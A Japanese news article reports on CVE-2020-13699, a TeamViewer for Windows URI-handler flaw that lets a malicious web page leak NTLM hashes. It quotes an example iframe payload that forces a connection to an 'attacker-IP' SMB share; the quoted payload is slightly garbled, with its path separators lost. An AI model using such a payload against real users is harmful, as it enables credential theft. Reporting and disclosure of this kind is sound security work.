TeamViewerの欠陥によりハッカーがシステムパスワードを盗む可能性がある

TeamViewerは最近、Windows用デスクトップアプリの高リスク脆弱性を修正し、新しいバージョンのソフトウェアをリリースしました。この脆弱性が悪用されると、リモート攻撃者がシステムパスワードを盗むことができる可能性があります。

さらに懸念されるのは、この攻撃が被害者の操作を必要とせず、ほぼ自動的に実行できることです。

知らない方のために、TeamViewerはドイツの会社TeamViewer GmbHが開発した人気のソフトウェアアプリケーションで、リモートコントロール、デスクトップ共有、オンライン会議、ウェブ会議、コンピュータ間のファイル転送を行うためのものです。

Microsoft Windows、Linux、macOS、Chrome OS、Android、iOS、Windows RT、Windows Phone 8、BlackBerryオペレーティングシステムで利用可能です。また、TeamViewerを実行しているシステムにはウェブブラウザからアクセスすることも可能です。

この深刻な脆弱性はCVE-2020-13699と呼ばれ、Praetorianのセキュリティ研究者Jeffrey Hofmannによって最初に発見されました。研究者によると、この脆弱性はTeamViewer for Windowsにあり、アプリケーションがカスタムURI（引用されていないURIハンドラ）を引用する方法に起因しています。

専門家は、この問題により攻撃者がソフトウェアにNTLM認証リクエストを攻撃者のシステムに中継させることができることを発見しました。言い換えれば、攻撃者はウェブページからTeamViewerのURIスキームを強制し、被害者のシステムにインストールされたアプリケーションを騙して攻撃者所有のリモートSMB共有への接続を開始させることができます。

これによりSMB認証プロセスがトリガーされ、システムのユーザー名とNTLMv2ハッシュ化されたパスワードが攻撃者に漏洩します。

CVE 2020-13699を成功裏に悪用するためには、攻撃者はウェブサイトに悪意のあるiframeを埋め込み、被害者をその悪意のあるURLに訪問させる必要があります。被害者がリンクをクリックすると、TeamViewerは自動的にWindowsデスクトップクライアントを起動し、リモートSMB共有を開きます。

「攻撃者は、悪意のあるURL（iframe src=’teamviewer10: –play \attacker-IPake.tvs’）を持つiframeをウェブサイトに埋め込むことができ、これによりTeamViewerのWindowsデスクトップクライアントが起動し、リモートSMB共有を開くことを強制することができます」とJeffrey Hofmannはアドバイザリーで説明しました。

「WindowsはSMB共有を開く際にNTLM認証を実行し、そのリクエストは中継（responderのようなツールを使用）され、コード実行のために使用されるか（またはハッシュクラッキングのためにキャプチャされる）可能性があります。」

この脆弱性は「URIハンドラ teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1、およびtvvpn1」に影響を与えます」とHofmannは述べました。

脆弱性が公開された後、TeamViewerプロジェクトは影響を受けたURIハンドラによって渡されたパラメータを引用することで欠陥を修正しました。例：URL:teamviewer10 プロトコル「C:\Program Files (x86)\TeamViewer\TeamViewer.exe」 「%1」。

欠陥を修正するために、「CVE 2020-13699に関連するURI処理の改善を実施しました」とTeamViewerは声明で述べました。「PraetorianのJeffrey Hofmannに感謝します。あなたの専門性と責任ある開示モデルに従っていただき感謝します。あなたが私たちに連絡を取り、最新のリリースであなたの発見の修正を確認できたことに感謝します。」

この問題に対処するために、TeamViewerはバージョン15.8.3をリリースし、ユーザーにこのバージョンへの即時アップグレードを推奨しています。

また読む - ベストTeamviewerの代替